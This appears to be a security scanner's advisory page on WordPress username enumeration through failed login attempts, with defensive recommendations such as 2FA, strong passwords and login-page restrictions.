Description
During the scan, Cytrix managed to find the WordPress – User Disclosure vulnerability. It has found that the site display usernames that should be concealed in order to prevent User Disclosure.
An attacker can abuse the WordPress – User Disclosure by using failed login attempts which allows him to enumerate valid usernames in order to use it for further attacks such as Phishing attempts, Brute-Force attacks, etc.
Web applications usually use an authentication mechanism to prevent unauthorized/anonymous users from accessing to the application’s protected resources and functionalities. Attackers will try to find flaws in the authentication mechanism to get into the protected resources and functionalities. Username enumeration is one of the most popular attacks that are performed against authentication mechanisms to identify the valid usernames on the system.
Recommendation
To prevent this vulnerability from happening:
- Use policies to enforce strong WordPress passwords.
- Enable 2FA with a WordPress two-factor authentication plugin.
- Add HTTP authentication for the WordPress login page.
- Restrict access to the login page (/wp-admin/) section to unauthorized IP addresses.
Also make sure to rename the admin account to something else to reduce the chance of successful brute force attacks.
References
https://wordpress.org/support/article/updating-wordpress/
< Return to all Vulnerabilities
